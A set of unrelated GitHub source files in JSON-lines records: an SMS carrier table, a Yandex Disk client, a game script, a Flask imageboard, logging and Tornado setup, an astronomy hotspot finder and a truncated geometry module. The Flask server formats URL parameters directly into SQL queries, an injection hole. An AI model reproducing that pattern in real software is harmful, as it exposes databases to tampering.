(Egypt)\",\n \"suffix\": \"@vodafone.com.eg\"\n },\n \"vodafone_uk\": {\n \"name\": \"Vodafone (UK)\",\n \"suffix\": \"@sms.vodafone.net\"\n },\n \"vodafone_italy\": {\n \"name\": \"Vodafone (Italy)\",\n \"suffix\": \"@sms.vodafone.it\"\n },\n \"vodafone_jp_chuugoku\": {\n \"name\": \"Vodafone (Japan - Chuugoku)\",\n \"suffix\": \"@n.vodafone.ne.jp\"\n },\n 
\"vodafone_jp_hokkaido\": {\n \"name\": \"Vodafone (Japan - Hokkaido)\",\n \"suffix\": \"@d.vodafone.ne.jp\"\n },\n \"vodafone_jp_hokuriko\": {\n \"name\": \"Vodafone (Japan - Hokuriko)\",\n \"suffix\": \"@r.vodafone.ne.jp\"\n },\n \"vodafone_jp_kansai\": {\n \"name\": \"Vodafone (Japan - Kansai)\",\n \"suffix\": \"@k.vodafone.ne.jp\"\n },\n \"vodafone_jp_osaka\": {\n \"name\": \"Vodafone (Japan - Osaka)\",\n \"suffix\": \"@k.vodafone.ne.jp\"\n },\n \"vodafone_jp_kanto\": {\n \"name\": \"Vodafone (Japan - Kanto)\",\n \"suffix\": \"@k.vodafone.ne.jp\"\n },\n \"vodafone_jp_koushin\": {\n \"name\": \"Vodafone (Japan - Koushin)\",\n \"suffix\": \"@k.vodafone.ne.jp\"\n },\n \"vodafone_jp_tokyo\": {\n \"name\": \"Vodafone (Japan - Tokyo)\",\n \"suffix\": \"@k.vodafone.ne.jp\"\n },\n \"vodafone_jp_kyuushu\": {\n \"name\": \"Vodafone (Japan - Kyuushu)\",\n \"suffix\": \"@q.vodafone.ne.jp\"\n },\n \"vodafone_jp_okinawa\": {\n \"name\": \"Vodafone (Japan - Okinawa)\",\n \"suffix\": \"@q.vodafone.ne.jp\"\n },\n \"vodafone_jp_shikoku\": {\n \"name\": \"Vodafone (Japan - Shikoku)\",\n \"suffix\": \"@s.vodafone.ne.jp\"\n },\n \"vodafone_jp_touhoku\": {\n \"name\": \"Vodafone (Japan - Touhoku)\",\n \"suffix\": \"@h.vodafone.ne.jp\"\n },\n \"vodafone_jp_niigata\": {\n \"name\": \"Vodafone (Japan - Niigata)\",\n \"suffix\": \"@h.vodafone.ne.jp\"\n },\n \"vodafone_jp_toukai\": {\n \"name\": \"Vodafone (Japan - Toukai)\",\n \"suffix\": \"@h.vodafone.ne.jp\"\n },\n \"vodafone_spain\": {\n \"name\": \"Vodafone (Japan - Spain)\",\n \"suffix\": \"@vodafone.es\"\n }\n}\n\ncarrier_slugs = carriers.keys()\ncarrier_form_tuples = [(key, carriers[key]['name']) for key in carriers.keys()]\n","repo_name":"kevana/corpscores","sub_path":"dci_notify/sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":9540,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"1374652851","text":"\"\"\"\nhttps://yadisk.readthedocs.io/ru/latest/intro.html\nhttps://github.com/ivknv/yadisk\n\"\"\"\nimport logging\nimport yadisk\n\n\nbase_manager_logger = logging.getLogger(__name__)\n\n\nclass YandexDiskBaseManager:\n \"\"\"Yandex disk clients base manager.\"\"\"\n\n def get_oauth_code_url(self, client_id: str, state: str, redirect_url: str) -> str:\n base_manager_logger.info(f\"Yandex disk base manager: get oauth code url started\")\n\n client = yadisk.YaDisk(client_id)\n url = client.get_code_url(state=state, redirect_url=redirect_url)\n\n base_manager_logger.info(f\"Yandex disk base manager: get oauth code url finished - {url}\")\n return url\n\n def get_tokens_from_response(self, response) -> dict:\n return {\n 'access_token': response.access_token,\n 'refresh_token': response.refresh_token,\n 'token_type': response.token_type,\n 'expires_in': response.expires_in,\n }\n\n def get_tokens(self, client_id: str, client_secret: str, code: str) -> dict:\n base_manager_logger.info(\"Yandex disk base manager: get tokens started\")\n\n client = yadisk.YaDisk(client_id, client_secret)\n response = client.get_token(code)\n\n base_manager_logger.info(\"Yandex disk base manager: get tokens finished\")\n return self.get_tokens_from_response(response)\n\n def check_access_token(self, access_token: str, **kwargs) -> bool:\n logger = kwargs.get(\"logger\", base_manager_logger)\n logger.info(\"Yandex disk base manager: check access token started\")\n\n client = yadisk.YaDisk(token=access_token)\n try:\n client.get_disk_info()\n except Exception:\n base_manager_logger.info(\"Yandex disk base 
\n            logger.info(\"Yandex disk base manager: access token not valid\")\n            return False\n\n        logger.info(\"Yandex disk base manager: access token valid\")\n        return True\n\n    def refresh_token(self, config, **kwargs) -> dict:\n        logger = kwargs.get(\"logger\", base_manager_logger)\n        logger.info(\"Yandex disk base manager: refresh token started\")\n        client = yadisk.YaDisk(id=config[\"client_id\"], secret=config[\"client_secret\"])\n        response = client.refresh_token(config[\"refresh_token\"])\n\n        logger.info(\"Yandex disk base manager: refresh token finished\")\n        return self.get_tokens_from_response(response)\n\n    def get_folder_files(self, access_token: str, folder_name: str, logger, **kwargs) -> list:\n        try:\n            logger.info(\"Yandex disk base manager: get folder files started\")\n            client = yadisk.YaDisk(token=access_token)\n            # listdir yields results lazily; materialise them so they can be logged and returned\n            files = list(client.listdir(folder_name))\n            logger.info(f\"Yandex disk base manager: get folder files finished, files - {files}\")\n        except Exception:\n            logger.error(\"Yandex disk base manager: get folder files error\", exc_info=True)\n            return []\n        return files\n\n    def create_folder(self, access_token: str, folder_name: str, logger, **kwargs) -> bool:\n        try:\n            logger.info(\"Yandex disk base manager: create folder started\")\n            client = yadisk.YaDisk(token=access_token)\n            data = client.mkdir(folder_name)\n        except Exception:\n            logger.error(\"Yandex disk base manager: create folder error\", exc_info=True)\n            return False\n\n        logger.info(f\"Yandex disk base manager: create folder finished - {data}\")\n        return True\n\n    def upload_file(\n        self, access_token: str, source_path: str, target_path: str, **kwargs\n    ) -> bool:\n        logger = kwargs.get(\"logger\", base_manager_logger)\n        logger.info(f\"Yandex disk base manager: upload file started\")\n        try:\n            client = yadisk.YaDisk(token=access_token)\n            client.upload(source_path, target_path, overwrite=True)\n        except Exception:\n            logger.error(\"Yandex disk base manager: upload file error\", exc_info=True)\n\n            return False\n\n        logger.info(\"Yandex disk base manager: upload file finished\")\n        return True\n\n    def delete_file(self, access_token: str, target_path: str, **kwargs) -> bool:\n        logger = kwargs.get(\"logger\", base_manager_logger)\n        logger.info(f\"Yandex disk base manager: delete file started, filename - {target_path}\")\n        try:\n            client = yadisk.YaDisk(token=access_token)\n            client.remove(target_path, permanently=True)\n        except Exception:\n            logger.error(\"Yandex disk base manager: delete file error\", exc_info=True)\n\n            return False\n\n        logger.info(\"Yandex disk base manager: delete file finished\")\n        return True\n","repo_name":"postman17/backuper","sub_path":"project/helpers/base_managers/yandex_disk.py","file_name":"yandex_disk.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24958210872","text":"import os\nimport random\n\nfrom game.casting.actor import Actor\nfrom game.casting.artifact import Artifact\nfrom game.casting.cast import Cast\n\nfrom game.directing.director import Director\n\nfrom game.services.keyboard_service import KeyboardService\nfrom game.services.video_service import VideoService\n\nfrom game.shared.color import Color\nfrom game.shared.point import Point\n\n\nFRAME_RATE = 12\nMAX_X = 900\nMAX_Y = 600\nCELL_SIZE = 15\nFONT_SIZE = 15\nCOLS = 60\nROWS = 40\nCAPTION = \"Greed\"\nDATA_PATH = os.path.dirname(os.path.abspath(__file__)) + \"/data/messages.txt\"\nWHITE = Color(255, 255, 255)\nDEFAULT_ARTIFACTS = 40\n\n\ndef main():\n    \n    # create the cast\n    cast = Cast()
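\n\n    # running score, displayed by the banner actor created below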
\n    total_score = 0 \n    \n    # create the banner or text\n    banner = Actor()\n    #banner.set_text(total_score)\n    banner.set_text(f'Score: {total_score}')\n    banner.set_font_size(FONT_SIZE)\n    banner.set_color(WHITE)\n    banner.set_position(Point(CELL_SIZE, 0))\n    cast.add_actor(\"banners\", banner)\n    \n    # create the robot\n    x = int(MAX_X / 2)\n    y = int(MAX_Y / -40) # makes the robot show at the bottom.\n    position = Point(x, y)\n\n    robot = Actor()\n    robot.set_text(\"#\")\n    robot.set_font_size(FONT_SIZE)\n    robot.set_color(WHITE)\n    robot.set_position(position)\n    cast.add_actor(\"robots\", robot)\n    \n    # create the artifacts\n    with open(DATA_PATH) as file:\n        data = file.read()\n        messages = data.splitlines()\n\n    seq = [42, 111]\n    for n in range(DEFAULT_ARTIFACTS):\n        text = chr(random.choice(seq))\n        #text = chr(random.randint(33, 126))\n        message = messages[n]\n\n        x = random.randint(1, COLS - 1)\n        #y = random.randint(1, ROWS - 1)\n        #y = 0\n        y = random.randint(1,5)\n        position = Point(x, y)\n        position = position.scale(CELL_SIZE)\n\n        r = random.randint(0, 255)\n        g = random.randint(0, 255)\n        b = random.randint(0, 255)\n        color = Color(r, g, b)\n\n        # creating the velocity \n        x_v = 0\n        y_v = 2\n        velocity = Point(x_v, y_v)\n        \n        artifact = Artifact()\n        artifact.set_text(text)\n        artifact.set_font_size(FONT_SIZE)\n        artifact.set_color(color)\n        artifact.set_position(position)\n        artifact.set_message(message)\n        artifact._velocity = velocity\n        artifact.move_next(MAX_X, MAX_Y)\n        cast.add_actor(\"artifacts\", artifact)\n    \n    # start the game\n    keyboard_service = KeyboardService(CELL_SIZE)\n    video_service = VideoService(CAPTION, MAX_X, MAX_Y, CELL_SIZE, FRAME_RATE)\n    director = Director(keyboard_service, video_service)\n    director.start_game(cast)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"magoodsell/CSE_210","sub_path":"rfk-incomplete/rfk/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33926318548","text":"from flask import Flask, request, render_template, g\nfrom werkzeug.utils import secure_filename\nimport sqlite3, datetime, os, random\n\n#DATABASE = 'chan.db'\n#UPLOAD_FOLDER = 'static/uploads'\nDATABASE = '/home/Rukkaitto/frchan/chan.db'\nUPLOAD_FOLDER = '/home/Rukkaitto/frchan/static/uploads'\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'webm'])\nSITE_NAME = 'frchan'\n\napp = Flask(__name__, static_url_path='/static')\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n@app.route('/')\ndef index():\n    boards = query_db(\"select * from boards order by board_short_name asc\")\n    return render_template('homepage.html', boards=boards, site_name=SITE_NAME)\n\n@app.route('/<board>')\ndef board(board):\n    boards = query_db(\"select * from boards order by board_short_name asc\")\n    board_name = query_db('select board_description from boards where board_short_name=\"{}\"'.format(board))\n    posts = query_db('select * from posts where board=\"{}\"'.format(board))\n    return render_template('board.html', posts=posts, board=board, site_name=SITE_NAME, boards=boards, board_name=board_name[0][0])\n\n@app.route('/<board>/post', methods = ['POST'])\ndef post(board):\n    filename = ''\n    if 'image' in request.files:\n        filename = upload_image(request.files['image'])\n\n    now = datetime.datetime.now()\n    name = request.form.get('name')\n    post_text = request.form.get('post_text')\n    if post_text == '':\n        return 'Empty post: not allowed'\n\n    if filename=='':\n        return 'Error: no file selected'\n\n    if name=='':
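\n        # no name given: fall back to the customary imageboard default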
\n        name='Anonymous'\n\n    post = (name,now.isoformat(),board,post_text,filename)\n\n    print (create_post(post))\n    return render_template('post_successful.html', board=board)\n\n@app.route('/<board>/replies/<int:post_id>')\ndef reply(board, post_id):\n    replies = query_db('select * from replies where replying_to=\"{}\"'.format(str(post_id)))\n\n    return render_template('replies.html', board=board, post_id=post_id, replies=replies)\n\n@app.route('/<board>/replies/<int:post_id>/post', methods = ['POST'])\ndef post_reply(board, post_id):\n    filename = ''\n    if 'image' in request.files:\n        filename = upload_image(request.files['image'])\n\n    now = datetime.datetime.now()\n    name = request.form.get('name')\n    post_text = request.form.get('post_text')\n\n    if name=='':\n        name='Anonymous'\n\n    post = (name,now.isoformat(),board,post_text,filename,post_id)\n    print (create_reply(post))\n    return render_template('post_successful.html', board=board)\n\ndef get_db():\n    db = getattr(g, '_database', None)\n\n    if db is None:\n        db = g._database = sqlite3.connect(DATABASE)\n\n    return db\n\ndef query_db(query, args=(), one=False):\n    cur = get_db().execute(query, args)\n    rv = cur.fetchall()\n    cur.close()\n    return (rv[0] if rv else None) if one else rv\n\ndef create_post(request):\n    query = ''' INSERT INTO posts(user, date, board, post_text, image_file) values (?,?,?,?,?) '''\n    cur = get_db().cursor()\n    cur.execute(query, request)\n    get_db().commit()\n    cur.close()\n    return cur.lastrowid\n\ndef create_reply(request):\n    query = ''' INSERT INTO replies(user, date, board, post_text, image_file, replying_to) values (?,?,?,?,?,?) '''\n    cur = get_db().cursor()\n    cur.execute(query, request)\n    get_db().commit()\n    cur.close()\n    return cur.lastrowid\n\ndef allowed_file(filename):\n    return '.' in filename and \\\n        filename.rsplit('.',1)[1].lower() in ALLOWED_EXTENSIONS\n\ndef upload_image(image):\n    filename=''\n    newfilename=''  # default return value when no valid image was supplied\n    if image and allowed_file(image.filename):\n        filename = secure_filename(image.filename)\n        newfilename = str(random.randint(10000,100000))+'.'+filename.rsplit('.',1)[1].lower()\n        image.save(os.path.join(app.config['UPLOAD_FOLDER'], newfilename))\n    return newfilename\n","repo_name":"Rukkaitto/frchan","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73341169708","text":"#!/bin/env python3\n# coding: utf-8\n\nimport os\nimport sys\nimport logging\nimport logging.config\nfrom pathlib import Path\nfrom dotenv import load_dotenv\n\n\nlogger = logging.getLogger(\"host-service.bin._base\")\n\nWORKDIR = Path(__file__).parent.parent.absolute()\nsys.path.insert(0, str(WORKDIR))\nos.chdir(WORKDIR)\n\nload_dotenv()\n\n# create the log directory\nLOG_DIR = WORKDIR.joinpath(\"logs\")\nif not LOG_DIR.exists():\n    LOG_DIR.mkdir()\n\n\ndef is_systemd() -> bool:\n    \"\"\"Check whether this process is running under systemd.\"\"\"\n    if os.getenv(\"INVOCATION_ID\"):\n        return True\n    # getppid() returns an int: direct children of PID 1 count as systemd-managed\n    if os.getppid() == 1:\n        return True\n    return False\n\n\nIS_SYSTEMD = is_systemd()\n\n\ndef logging_configurator(\n    name=__name__,\n    console_print=True,\n    console_level=\"DEBUG\",\n    file_level=\"INFO\",\n):\n    \"\"\"Build and apply the logging configuration.\"\"\"\n    handlers = [\"file\"]\n    if console_print:\n        handlers.append(\"console\")\n\n    log_config = {\n        \"version\": 1,\n        \"disable_existing_loggers\": False,\n        \"formatters\": {\n            \"simple\": {\"format\": \"%(asctime)s %(name)s %(levelname)s - %(message)s\"},\n            \"systemd\": {\"format\": \"%(name)s %(levelname)s - %(message)s\"},\n            \"error\": {\n                \"format\": (
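\n                    # verbose multi-line layout used by the file_warning handler for WARNING records and above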
\n                    \"TIME = %(asctime)s \\n\"\n                    \"FILE_NAME = %(filename)s \\n\"\n                    \"FUNC_NAME = %(funcName)s \\n\"\n                    \"LINE_NO = %(lineno)d \\n\"\n                    \"LEVEL = %(levelname)s \\n\"\n                    \"MESSAGE = %(message)s \\n\"\n                    \"EXCEPTION = %(exc_info)s \\n\"\n                    \"+------------------------------------------+\"\n                )\n            },\n        },\n        \"handlers\": {\n            \"console\": {\n                \"class\": \"logging.StreamHandler\",\n                \"formatter\": \"systemd\" if is_systemd() else \"simple\",\n                \"level\": console_level,\n            },\n            \"file\": {\n                \"class\": \"logging.handlers.RotatingFileHandler\",\n                \"formatter\": \"simple\",\n                \"level\": file_level,\n                \"filename\": f\"logs/{name}.log\",\n                \"mode\": \"a+\",\n                \"maxBytes\": 50 * 1024**2,\n                \"backupCount\": 5,\n            },\n            \"file_warning\": {\n                \"class\": \"logging.handlers.RotatingFileHandler\",\n                \"formatter\": \"error\",\n                \"level\": \"WARNING\",\n                \"filename\": f\"logs/{name}-error.log\",\n                \"mode\": \"a+\",\n                \"maxBytes\": 50 * 1024**2,\n                \"backupCount\": 5,\n            },\n            \"root_handler\": {\n                \"class\": \"logging.handlers.RotatingFileHandler\",\n                \"level\": \"DEBUG\",\n                \"formatter\": \"simple\",\n                \"filename\": \"logs/root.log\",\n                \"mode\": \"a+\",\n                \"maxBytes\": 50 * 1024**2,\n                \"backupCount\": 5,\n            },\n            \"loki\": {\n                \"class\": \"tools.logging_handle.LokiHandler\",\n                \"formatter\": \"simple\",\n                \"level\": \"DEBUG\",\n                \"flush_level\": \"WARNING\",\n                \"capacity\": 50,\n                \"host\": os.getenv(\"LOKI_HOST\"),\n                \"user_id\": os.getenv(\"LOKI_USER_ID\"),\n                \"api_key\": os.getenv(\"LOKI_API_KEY\"),\n                \"verify\": False,\n            },\n        },\n        \"loggers\": {\n            \"host-service\": {\n                \"handlers\": handlers,\n                \"level\": \"DEBUG\",\n            }\n        },\n        \"root\": {\n            \"handlers\": [\"root_handler\", \"file_warning\", \"loki\"],\n            \"level\": \"DEBUG\",\n        },\n    }\n    logging.config.dictConfig(log_config)\n    logger.warning(f\"Restart {name} ......\")\n\n\nif __name__ == \"__main__\":\n    logging_configurator()\n    logger = logging.getLogger(\"host-service\")\n    print(logger.handlers)\n","repo_name":"lee-cq/host-service","sub_path":"bin/_base.py","file_name":"_base.py","file_ext":"py","file_size_in_byte":3819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73452325546","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n    tornado application\n\"\"\"\nfrom tornado.web import Application\nfrom tornado_sqlalchemy import make_session_factory\nfrom sqlalchemy.exc import IntegrityError\n\nfrom config import CONFIG\nfrom url_mapping import ROUTES\nfrom app.models import *\n\nsession_factory = make_session_factory(CONFIG.MYSQL_URI)\n\ndef init_data():\n    session = session_factory.make_session()\n    init_users = User.gen_users()\n    for user in init_users:\n        session.add(user)\n    try:\n        session.commit()\n        print('generate users successfully')\n    except IntegrityError:\n        session.rollback()\n        print('fail to generate users')\n\n\nclass App(Application):\n    def __init__(self,config):\n        tornado_settings = config.TORNADO_SETTINGS\n        print(tornado_settings)\n        print(ROUTES)\n        Application.__init__(self, handlers=ROUTES, session_factory=session_factory,**tornado_settings)\n\n\ndef create_app():\n    app = App(CONFIG)\n    return app\n","repo_name":"haojunyu/rec_platform","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18162170726","text":"
#! /usr/bin/env python3\n\nfrom astropy.utils.exceptions import AstropyWarning, AstropyUserWarning\nfrom astropy.io import fits\nimport argparse\nimport datetime\nimport re\nimport sys\nimport warnings\nimport remgeom\nimport trimarrays\nimport numpy as np\nimport miscutils\nimport copy\n\n\nclass hotspot(object):\n    \"\"\"Record details of hotspot\"\"\"\n\n    def __init__(self, file, row, col, val):\n        self.file = file\n        self.row = int(row)\n        self.col = int(col)\n        self.value = val\n\n    def __hash__(self):\n        return self.row * 1024 + self.col\n\n    def __eq__(self, other):\n        return self.row == other.row and self.col == other.col\n\n\ndef ptrail(s, e):\n    \"\"\"Print trailing stuff\"\"\"\n    if e != s:\n        print(\"\\t%d - %d\" % (s, e))\n    else:\n        print(\"\\t%d\" % s)\n\n# Shut up warning messages\n\n\nwarnings.simplefilter('ignore', AstropyWarning)\nwarnings.simplefilter('ignore', AstropyUserWarning)\nwarnings.simplefilter('ignore', UserWarning)\n\nparsearg = argparse.ArgumentParser(description='Get list of hotspots in one or more files',\n                                   formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparsearg.add_argument('files', type=str, nargs='+', help='List of files to select from')\nparsearg.add_argument('--nstd', type=float, default=5.0, help='Number of std devs to select from')\nparsearg.add_argument('--trim', type=int, default=100, help='Amount to trim each side')\nparsearg.add_argument('--percent', type=float, default=1.0, help='Minimum percentage of files a hotspot must appear in to be considered significant')\n\nresargs = vars(parsearg.parse_args())\n\nfiles = resargs['files']\nnstd = resargs['nstd']\ntrimsides = resargs['trim']\npercent = resargs['percent']\n\nresarray = []\n\nfilesdone = dict()\n\nfor file in files:\n\n    if file in filesdone:\n        continue\n\n    try:\n        ff = fits.open(file)\n    except OSError as e:\n        print(\"Cannot open\", file, e.strerror, file=sys.stderr)\n        continue\n\n    fdat = ff[0].data\n    ff.close()\n    stripf = miscutils.removesuffix(file, all=True)\n\n    fdat = trimarrays.trimzeros(trimarrays.trimnan(fdat))\n    trimmed = fdat.copy()\n    if trimsides > 0:\n        trimmed = trimmed[trimsides:-trimsides, trimsides:-trimsides]\n    fm = trimmed.mean()\n    hotval = fm + trimmed.std() * nstd\n\n    rwh, cwh = np.where(fdat > hotval)\n\n    for r, c in zip(rwh, cwh):\n        resarray.append(hotspot(stripf, r, c, fdat[r, c]))\n\n    filesdone[file] = 1\n\ncollated = dict()\n\nif len(resarray) == 0:\n    print(\"No hotspots found anywhere\", file=sys.stderr)\n    sys.exit(1)\n\nfor res in resarray:\n\n    try:\n        orig = collated[res]\n    except KeyError:\n        orig = []\n\n    orig.append(res)\n    collated[res] = orig\n\nnthresh = len(filesdone) * percent / 100.0\npc = 100.0 / len(filesdone)\n\nselected = []\nfor v in collated.values():\n    if len(v) >= nthresh:\n        selected.append((v[0].row, v[0].col, len(v)))\n\nprint(len(selected), \"hotspots found\")\nbyvalrowcol = sorted(sorted(sorted(selected, key=lambda x: x[1]), key=lambda x: x[0]), key=lambda x: x[2], reverse=True)\nbyvalcolrow = sorted(sorted(sorted(selected, key=lambda x: x[0]), key=lambda x: x[1]), key=lambda x: x[2], reverse=True)\nrowcol = sorted(sorted(selected, key=lambda x: x[1]), key=lambda x: x[0])\ncolrow = sorted(sorted(selected, key=lambda x: x[0]), key=lambda x: x[1])\n\nlastval = -9\n\nprint(\"By value, row, column:\")
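\n# each selected entry is (row, col, n_files): a hot pixel and how many files flagged it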
\nfor r, c, v in byvalrowcol:\n    if v != lastval:\n        print(\"%d occurrences %7.2f:\" % (v, v * pc))\n        lastval = v\n    print(\"\\t%4d%4d\" % (r, c))\n\nlastval = -9\n\nprint(\"By value, column, row\")\nfor r, c, v in byvalcolrow:\n    if v != lastval:\n        print(\"%d occurrences %7.2f:\" % (v, v * pc))\n        lastval = v\n    print(\"\\t%4d%4d\" % (r, c))\n\nprint(\"By row\")\nlastval = -9\nstsq = endsq = -100\n\nfor r, c, v in rowcol:\n    if lastval != r:\n        print(\"Row %d\" % r)\n        lastval = r\n        if stsq >= 0:\n            ptrail(stsq, endsq)\n            stsq = endsq = -100\n    if endsq == c - 1:\n        endsq = c\n    else:\n        if stsq >= 0:\n            ptrail(stsq, endsq)\n        stsq = endsq = c\n\nif stsq >= 0:\n    ptrail(stsq, endsq)\n    stsq = endsq = -100\n\nlastval = -9\nfor r, c, v in colrow:\n    if lastval != c:\n        print(\"Column %d\" % c)\n        lastval = c\n        if stsq >= 0:\n            ptrail(stsq, endsq)\n            stsq = endsq = -100\n    if endsq == r - 1:\n        endsq = r\n    else:\n        if stsq >= 0:\n            ptrail(stsq, endsq)\n        stsq = endsq = r\nif stsq >= 0:\n    ptrail(stsq, endsq)\n    stsq = endsq = -100\n","repo_name":"JohnMCollins/python-astro-progs","sub_path":"Numpy/remfits/hotspots.py","file_name":"hotspots.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28637864714","text":"# Name : 박동주\n# Student ID : 2017136042\n# 2021. 4. 7.\n\n\nfrom scheduleInfo import Process\nfrom scheduleInfo import Request\nfrom chartinfo import chartinfo\nfrom collections import deque\n\nfrom time import sleep\n\nclass SRTN:\n    # process_list : a list of Process objects\n    # request : carries the core_number and time_quantum settings\n    def __init__(self, processList, request):\n        self.__processList = processList\n        self.__request = request\n\n    def scheduling(self):\n        core_num = self.__request.get_coreNumber()\n        ps_list = self.__processList\n\n        retList = [deque() for i in range(core_num)]\n\n        Time = 0\n\n        # remaining burst time per process\n        #bt = [0] * 15\n        bt = dict()\n        for ps in ps_list: bt[ps.get_id()] = ps.get_bt()\n\n        idToProcess = dict()\n        for ps in ps_list: idToProcess[ps.get_id()] = ps\n\n        # ids of currently running processes\n        runningProcessId = set()\n\n        while sum(bt.values()) > 0:\n            # ids of processes waiting for a core\n            waitingProcessId = []\n            for i in range(len(ps_list)):\n                id = ps_list[i].get_id()\n                if bt[id] > 0 and ps_list[i].get_at() <= Time and id not in runningProcessId:\n                    waitingProcessId.append(id)\n\n            # if any process is waiting:\n            #  1. place it on an idle core\n            #  2. otherwise compare remaining times and preempt
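\n            # (SRTN = shortest remaining time next: the waiting job with the least remaining burst time always wins a core)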
\n            if len(waitingProcessId) > 0:\n                # sort by remaining burst time\n                waitingProcessId.sort(key=lambda x: bt[x])\n\n                # cores that already received a process this tick\n                load_complete = [False] * core_num\n\n                # place waiting processes on idle cores\n                for i in range(core_num):\n                    if len(waitingProcessId) == 0: break\n                    if len(retList[i]) == 0 or retList[i][-1].get_process().get_id() not in runningProcessId:\n                        id = waitingProcessId.pop(0)\n                        #newProcess = Process(id, Time, 0)\n                        newProcess = chartinfo(Time, 0, 0, idToProcess[id])\n                        retList[i].append(newProcess)\n                        load_complete[i] = True\n                        runningProcessId.add(id)\n\n                # look for cores whose process should be preempted\n                for i in range(core_num):\n                    if len(waitingProcessId) == 0: break\n                    if load_complete[i] : continue\n\n                    # preempt when a waiting process has less remaining time than the running one\n                    ps = retList[i][-1].get_process()\n                    currBt = bt[ps.get_id()]\n                    if currBt > bt[waitingProcessId[0]]:\n                        runningProcessId.remove(ps.get_id())\n                        id = waitingProcessId.pop(0)\n                        #newProcess = Process(id, Time, 0)\n                        newProcess = chartinfo(Time, Time, 0, idToProcess[id])\n                        retList[i].append(newProcess)\n                        runningProcessId.add(id)\n\n            # advance each running process by one tick:\n            # its elapsed time grows, its remaining burst time shrinks,\n            # and ids that reach zero leave runningProcessId\n            for i in range(core_num):\n                if len(retList[i]) == 0: continue\n\n                chartinfo1 = retList[i][-1]\n                ps = chartinfo1.get_process()\n                if ps.get_id() in runningProcessId:\n                    chartinfo1.set_end_time(Time + 1)\n\n                    id = ps.get_id()\n                    bt[id] -= 1\n                    if bt[id] <= 0:\n                        runningProcessId.remove(id)\n                        tt = Time + 1 - idToProcess[id].get_at()\n                        wt = tt - idToProcess[id].get_bt()\n                        ntt = tt / idToProcess[id].get_bt()\n\n                        idToProcess[id].set_tt(tt)\n                        idToProcess[id].set_wt(wt)\n                        idToProcess[id].set_ntt(ntt)\n\n            Time += 1\n\n        return retList  # return the completed schedule\n\n\n\nif __name__ == \"__main__\" :\n    psList = []\n    psList.append(Process(0, 0, 3))\n    psList.append(Process(1, 1, 7))\n    psList.append(Process(2, 3, 2))\n    psList.append(Process(3, 5, 5))\n    psList.append(Process(4, 6, 3))\n\n    request = Request()\n    request.set_coreNumber(4)\n    request.set_timeQuantum(2)\n\n    scheduler = SRTN(psList, request)\n    q = scheduler.scheduling()\n    '''\n    for i in range(len(q)):\n        for j in range(len(q[i])):\n            print('PID%d %ds' % (q[i][j].get_id(), q[i][j].get_bt()), end=' | ')\n        print()\n    '''","repo_name":"kjhcocomi/process-scheduling-simulator","sub_path":"sourcecode/SRTN.py","file_name":"SRTN.py","file_ext":"py","file_size_in_byte":4766,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"518302016","text":"\n\n\"\"\"\ntranslate.py\n\nTranslate between different geometry file formats.\n\n-- psana\nextension: .data\nformat: flat text\nunits: microns\n\n\n-- Cheetah\nextension: .h5\nformat: HDF5\nunits: mm for x/y, microns for z\n\n\n-- CrystFEL\nextension: .geom\nformat: flat text\nunits: all CrystFEL units are pixel units, \n       except the sample-to-detector offset\nreferences: http://www.desy.de/~twhite/crystfel/manual-crystfel_geometry.html\n\n\n-- Thor\nextension: .dtc\nformat: HDF5\nunits: intrinsic -- that is, any unit is allowed so long as it is\n       self-consistent (all units the same)\n\n\n-- DIALS\nextension: .json\nformat: JSON\nunits: intrinsic\nreferences: http://journals.iucr.org/j/issues/2014/04/00/jo5001/index.html\n            http://journals.iucr.org/d/issues/2016/04/00/gm5043/index.html#BB30\n            http://journals.iucr.org/d/issues/2018/09/00/lp5037/index.html\n\"\"\"\n\n\nimport os\nimport re\nimport getpass\nimport datetime\nimport h5py\nimport math\nimport warnings\nimport json\n\nimport numpy as np\n\nfrom psgeom import sensors
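\n# basisgrid supplies the BasisGrid panel representation -- a position vector p, slow/fast pixel vectors s and f, and a shape -- that every converter below reads and writes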
\nfrom psgeom import basisgrid\n\n\ndef _check_obj(obj):\n    \"\"\"\n    check that the object a detector geometry is being loaded into is \"valid\"\n    \"\"\"\n    # NOT IMPLEMENTED\n    return\n\n\ndef _natural_sort(l): \n    convert = lambda text: int(text) if text.isdigit() else text.lower() \n    alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ] \n    return sorted(l, key = alphanum_key)\n\n\n# ---- psana -------------------------------------------------------------------\n\n# define a \"type map\" that maps a list of known object identifier strings to\n# the corresponding types\n\ndef map_type(element_name, version=None):\n    \n    if version is None:\n        try:\n            version = int( re.search(r'V(\\d+)', element_name).group(1) )\n        except:\n            # most elements' version 1 has no \"Vx\" string\n            # will be \"MTRX:X1:Y1:X2:Y2\" instead of \"MTRX:Vx:X1:Y1:X2:Y2\"\n            version = 1\n\n    if element_name.startswith('SENS2X1'):\n        element_type = sensors.Cspad2x1\n    \n    elif element_name.startswith('PNCCD'):\n        element_type = sensors.PnccdQuad\n        if version < 2:\n            raise TypeError('psgeom v1.0+ requires PNCCD:V2+, got V%d' % version)\n    \n    elif element_name.startswith('MTRX'):\n      